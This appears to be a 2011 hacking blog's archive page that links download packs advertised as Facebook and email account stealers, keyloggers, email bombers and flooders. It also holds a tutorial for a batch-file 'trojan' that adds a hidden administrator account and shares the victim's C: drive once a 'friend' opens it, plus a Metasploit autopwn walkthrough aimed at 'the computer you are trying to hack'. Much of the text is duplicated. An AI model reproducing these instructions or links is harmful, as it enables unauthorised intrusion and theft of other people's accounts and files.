Showing posts with label Hacking Tools. Show all posts
Showing posts with label Hacking Tools. Show all posts
Monday, June 6, 2011
Thursday, June 2, 2011
BLAZER'S TOOL KIT - ALL IN ONE HACKING SOFTWARE TOOLS PACK - DOWNLOAD
http://www.mediafire.com/?9qa37of7ihd1z
Password: ABlaZerBoTRelease
Features:
★ Inbuilt Web Browser with Java Script and Flash
★ Email Bomber
★ Port Scanner
★ Screen Recorder
★ Pinger
★ Anti-Virus Finder
★ File-Downloader and much more.....
Requirements:
• Dot Net Framework
Compatible OSes
• Windows 7 (32 & 64 Bit) (Tested)..
• Windows Vista (32 & 64 Bit) (Tested)..
• Windows XP (32 & 64 Bit) (Tested)...
Features to Come
- Stealer..
- Keylogger..
- FTP Client..
- SQLi Helper..
- Admin Page Finder..
- Exploit Finder..
Password: ABlaZerBoTRelease
Features:
★ Inbuilt Web Browser with Java Script and Flash
★ Email Bomber
★ Port Scanner
★ Screen Recorder
★ Pinger
★ Anti-Virus Finder
★ File-Downloader and much more.....
Requirements:
• Dot Net Framework
Compatible OSes
• Windows 7 (32 & 64 Bit) (Tested)..
• Windows Vista (32 & 64 Bit) (Tested)..
• Windows XP (32 & 64 Bit) (Tested)...
Features to Come
- Stealer..
- Keylogger..
- FTP Client..
- SQLi Helper..
- Admin Page Finder..
- Exploit Finder..
Labels:
Email Hacking,
Exploits,
Hacking,
Hacking Tools,
Keyloggers,
Password Hacking,
Phishers,
Proxies,
RATS,
Trojans,
Viruses
Tuesday, May 31, 2011
ALL IN ONE BEST HACKING TOOLS PACK FOR BEGINNERS - DOWNLOAD
Ultimate Hack Tools 2011:
www.hack-tools2011.blogspot.com (My Website)
FACEBOOK HACKS:-
FaceSnoop Fb Account Stealler:
http://www.mediafire.com/?ka8p2eiqn29y7f7
Facebook GOLDEN HACK:
http://www.mediafire.com/?r84zaawbrjhpp0y
Download Facesnoop2 Free:
http://fileme.us/2JEa9
New Facebook Password Hacker V.2.5:
http://www.mediafire.com/?5w80twyt99g66y2
Facebook Account Hacker Build 7:
http://www.mediafire.com/?8e33go8d4b4adpq
Facebook Freezer:
http://www.mediafire.com/?y4jtdtgnzay
Facebook Password Cracker:
http://www.4shared.com/file/vzXf1310/Facebook_Password_Cracker.html
Facebook Account Stealler:
http://www.ziddu.com/download/15029853/FacebookAcc ountHacker.exe.html
Facebook Credit Generator:
http://www.mediafire.com/?y76hliarcob4miv
FB Credit Hack:
http://hotfile.com/dl/110065271/5749517/FBCredits. exe.html
http://www.mediafire.com/?paq7amaj5i7isi3
FACEBOOK APPS HACKS:-
Farmville Hack:
http://www.megaupload.com/?d=CDNB4TNM
Texas Hold Em Poker:
http://www.megaupload.com/?d=LIAD6F31
Get passwords Here:
http://hacking-application s.info/hacks/farmville/
EMAIL HACKING TOOLS:-
FACEBOOK HACKS:-
FaceSnoop Fb Account Stealler:
http://www.mediafire.com/?ka8p2eiqn29y7f7
Facebook GOLDEN HACK:
http://www.mediafire.com/?r84zaawbrjhpp0y
Download Facesnoop2 Free:
http://fileme.us/2JEa9
New Facebook Password Hacker V.2.5:
http://www.mediafire.com/?5w80twyt99g66y2
Facebook Account Hacker Build 7:
http://www.mediafire.com/?8e33go8d4b4adpq
Facebook Freezer:
http://www.mediafire.com/?y4jtdtgnzay
Facebook Password Cracker:
http://www.4shared.com/file/vzXf1310/Facebook_Password_Cracker.html
Facebook Account Stealler:
http://www.ziddu.com/download/15029853/FacebookAcc
Facebook Credit Generator:
http://www.mediafire.com/?y76hliarcob4miv
FB Credit Hack:
http://hotfile.com/dl/110065271/5749517/FBCredits.
http://www.mediafire.com/?paq7amaj5i7isi3
FACEBOOK APPS HACKS:-
Farmville Hack:
http://www.megaupload.com/?d=CDNB4TNM
Texas Hold Em Poker:
http://www.megaupload.com/?d=LIAD6F31
Get passwords Here:
http://hacking-application
EMAIL HACKING TOOLS:-
Yahoo Hacking Tools:
http://www.multiupload.com/JA1Q5UTJ3J
MSN Password Hacker:
https://rs649dt.rapidshare.com/#!download|649tg|228011530|msn_vista_login__NEW_.exe|184|R~3 E16BC2DC30DE5C89B88CCFA12A23AA6
SHARECASH:-
MSN Password Hacker:
https://rs649dt.rapidshare.com/#!download|649tg|228011530|msn_vista_login__NEW_.exe|184|R~3 E16BC2DC30DE5C89B88CCFA12A23AA6
SHARECASH:-
Latest Sharecash Downloader:
http://www.mediafire.com/?utyccch61uz3tu2http://www.mediafire.com/?5o1f1wlqrhtfxbb
http://filesmy.com/0h966J
Sharecash Downloader:
http://www.ziddu.com/download/15029850/ShareCashDo
Sharecash Money Adder:
http://www.ziddu.com/download/15029851/SharecashMo
WILD ONES HACKS:-
iTunes Code Gen:
http://www.ziddu.com/download/15029846/ItunesGenv1 3.exe.html
MOF Hack:
http://www.ziddu.com/download/15029847/MOFHACK.exe .html
LinkBuks Clicker:
MOF Hack:
http://www.ziddu.com/download/15029847/MOFHACK.exe
LinkBuks Clicker:
Lockerz Points Hack:
Labels:
Email Hacking,
Facebook Tricks,
Hacking,
Hacking Tools,
Password Hacking,
Trojans
NETTOOLS - AWESOME PACKAGE OF CRAZY HACKING TOOLS - DOWNLOAD
DOWNLOAD HERE:
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm
This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm
This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
Friday, May 27, 2011
BUILD YOUR OWN SERVER TROJAN FILE (.BAT) - REMOTE ADMIN - HACKING WITHOUT ANY TOOL
Pen a dos prompt we will only need a dos prompt, and windows xp…
Basics
Opening a dos prompt -> Go to start and then execute and writeBasics
cmd and press ok
Now insert this command: net
And you will get something like this
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
pause
And now save this as test.bat and execute it.
Funny aint it ?
Funny aint it ?
Starting
Server
The plan here is to share the C: drive and make a new user
with administrators access
Server
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
.bat file and send to your friend.
Extras
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
Client
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Labels:
Computer Hacking,
Hacking,
Hacking Tools,
How Tos,
RATS
HOW TO HACK ANY COMPUTER THROUGH METASPLOIT USING HIS IP ADDRESS
Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...
1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
![[Image: pgadmin.bmp]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uCIFkuQShw5zukui8rwoAw5jJHvgDtKlwcdAMNrTGnZjWgrg6HR0ASwyqT7HamuLJzhA6W3bB8sFDDaVWWwZn-IsvGukcUncoj2gkH6yf1iRO4SIm3Ao2m4ievR1TQcxlhuf5uydsUKYE=s0-d)
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:
![[Image: metasploit.bmp]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sLf7DghJLRWjTjs0jM2YmsmG4442myKBLlMxJl7KJtBxGAeSlAA_swI1aSvxF73uxPY8LaKmras75CANqLt0a3iBetf1MnBSczW7h9nYJ5kBN1FmiFInZtaheyzFavwzIrkZKgdcu7KP3jEYk=s0-d)
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't wory, this is normal.
6.)Type db_host to make sure you are connected correctally.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...
8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber
___________________________________________________________
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.
1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't wory, this is normal.
6.)Type db_host to make sure you are connected correctally.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...
8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber
___________________________________________________________
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.
Labels:
Computer Hacking,
Hacking,
Hacking Tools,
How Tos,
IP Address
HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL
Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download Here:
http://sourceforge.net/projects/sqlmap/files/
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download Here:
http://sourceforge.net/projects/sqlmap/files/
Labels:
Hacking,
Hacking Tools,
How Tos,
Website Hacking
WI-FI SCANNING & HACKING TOOLS
Guys you must know everything that's why i am explaining each and everything in this tutorials related to wireless networks or wifi hacking. Its a complete wireless network hacking tutorial with allhacking tools and how to use them. Using these you will came to know how to hack wifi or wireless networks and note guys this tutorial is 110% working like other one's.
Note: This article is only for Educational Purposes so that you can understand the loopholes in wireless networks and fix them. Any misuse can result in disastrous consequences like cyber crime.
Don't worry everything is ethical till you misuses it. So always try to be ethical as far as possible. Lets start from the first topic...
1. WIRELESS SCANNING TOOLS
Scanning tools is needed to scan the wifi or wireless networks around you. First of all we need to scan all the wireless networks so that we can select the wireless network to hack. There are several wireless scanning tools but my favorite is NET STUMBLER. And for Mac operating systems is MacStumbler.
There are several Wireless scanning tools, a list of all wireless scanning tools is given below:
a. NetStumbler for Windows operating systems.
NetStumbler (also known as Network Stumbler) is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It runs on Microsoft Windows 98 and above. A trimmed-down version called MiniStumbler is available for Windows CE.
NetStumbler is commonly used for:
- Wardriving
- Verifying network configurations
- Finding locations with poor coverage in one’s WLAN
- Detecting causes of wireless interference
- Detecting unauthorized (”rogue”) access points
- Aiming directional antennas for long-haul WLAN links
b. MacStumbler for Mac operating systems.
MacStumbler is a small utility to emulate the functionality of projects like netstumbler, bsd-airtools, and kismet. It's meant purely for educational or auditing purposes, although many people enjoy using these types of programs to check out how many WiFi (wireless) networks are in their area, usually known as "war driving".
MacStumbler only works with AirPort wireless cards, it does not (yet) work with any PCMCIA or USB wireless devices.
c. Kismet for Windows and Linux.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic. Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.
d. Redfang 2.5
Redfang is an application that finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the device's Bluetooth address and doing a read_remote_name().
http://www.hacker-soft.net/Soft/Soft_4399.htm
e. THC-WarDrive
THC-WarDrive is a tool for mapping your city for wavelan networks with a GPS device while you are driving a car or walking through the streets. THC-WarDrive is effective and flexible, a "must-download" for all wavelan nerds.
f. PrismStumbler
Prismstumbler is software which finds 802.11 (WLAN) networks. It comes with an easy to use GTK2 frontend and is small enough to fit on a small portable system. It is designed to be a flexible tool to find as much information about wireless LANinstallations as possible. Because of its client-server architecture the scanner engine may be used for different frontends.
g. Mognet
Mognet is a free, open source wireless ethernet sniffer/analyzer written in Java. It is licensed under the GNU General Public License. It was designed with handheld devices like the iPaq in mind, but will run just as well on a desktop or laptop to find wireless networks.
h. WaveStumbler
WaveStumbler is console based 802.11 network mapper for Linux. It reports the basic AP stuff like channel, WEP, ESSID, MAC etc. It has support for Hermes based cards (Compaq, Lucent/Agere, … ) It still in development but tends to be stable. It consist of a patch against the kernel driver, orinoco.c which makes it possible to send the scan command to the driver viathe /proc/hermes/ethX/cmds file. The answer is then sent back via a netlink socket. WaveStumbler listens to this socket and displays the output data on the console.
i. StumbVerter
StumbVerter is a standalone application which allows you to import Network Stumbler's summary files into Microsoft's MapPoint 2002 maps. The logged WAPs will be shown with small icons, their colour and shape relating to WEP mode and signal strength.
j. AP Scanner
Wireless Access Point Utilites for Unix - it's a set of utilites to configure and monitor Wireless Access Points under Unix using SNMP protocol. Utilites knownly compiles and run under Linux, FreeBSD, NetBSD and AIX.
k. SSID Sniff
SSIDsniff is a nifty tool to use when looking to discover access points and save captured traffic. Comes with a configure script and supports Cisco Aironet and random prism2 based cards.
l. Wavemon
Wavemon is a ncurses based application forwireless hardware. It`s running currently under Linux with cards witch supported by Jean Tourrilhes wireless extensions. You will find them in the Kernel 2.4. I used this tool a few times, it`s small, works, opensource and good.
m. Wireless Security Auditor
Wireless Security Auditor allows network administrators to verify how secure a company’s wireless network is by executing an audit of accessible wireless networks. Featuring patent-pending cost-efficient GPU acceleration technologies, Elcomsoft Wireless Security Auditor attempts to recover the original WPA/WPA2 -PSK text passwords in order to test how secure your wireless environment is.
n. AirTraf
AirTraf 1.0 is a wireless sniffer that can detect and determine exactly what is being transmitted over 802.11 wireless networks. This open-source program tracks and identifies legitimate and rogue access points, keeps performance statistics on a by-user and by-protocol basis, measures the signal strength of network components, and more.
o. AirMagnet
AirMagnet WiFi Analyzer is the industry "de-facto" tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. AirMagnet WiFi Analyzer helps IT staff quickly solve end user issues while automatically detecting network security threats and other wireless network vulnerabilities.
Labels:
Hacking,
Hacking Tools,
WiFi Hacking
HOW TO USE NETSTUMBLER FOR WI-FI HACKING AND SECURITY
1. Download the NetStumbler and Install it.
2. Run the NetStumbler. Then it will automatically starts scanning the wireless Networks around you.
3. Once its completed, you will see the complete list of wireless networks around you as shown in thesnapshot below:
| List of Wireless Networks Scanned by NetStumbler |
There you will see different columns such as MAC, SSID, SPEED, VENDOR, TYPE and much more...
4. Now select anyone of the MAC address that you wish to hack and want to explore more about that. If you click on the MAC address of one of the discovered wireless networks under channels, you will see a graph that shows the wireless network’s signal strength. The more green and the less spaces are there,it indicates better is signal strength.
5. As you can see NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, Channel number,encryption type, and a bunch more. All of these come in use when we decides that we wants to get in the secured network by cracking the encryption.
There are two most common types of Encryption Methods used by Wireless Networks:
a. WEP (Wired Equivalent Privacy) – WEP isn’t considered safe anymore. Many flaws have been discovered that allow hackers to crack a WEP key easily. I will explain how to hack the WEP in next tutorial so guys keep reading..
b. WAP (Wireless Application Protocol) – WAP is the currently the most secure and best option to secure your wireless network. It’s not as easily cracked as WEP because the only way to retrieve a WAP key is
to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won’t work and it could take decades to crack it if you brute-force it. This is why most hackers don’t even bother. But I will explain you smarter ways to hack WAP keys also rather than these noobish methods. I will explain this in my next consecutive tutorials. So guys keep visiting.
to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won’t work and it could take decades to crack it if you brute-force it. This is why most hackers don’t even bother. But I will explain you smarter ways to hack WAP keys also rather than these noobish methods. I will explain this in my next consecutive tutorials. So guys keep visiting.
Thats all about scanning the wireless networks, if you want that i should explain the other tools then please post in comments. I can explain them in future on demand.
Now how can protect our wireless network from scanned by NetStumber.
How to Protect yourself from NetStumbler?
1. Don not broadcast your SSID.
2. Always try to use stronger passwords like atleast one digit, one special character, uppercase letters mixed with lowercase letters.
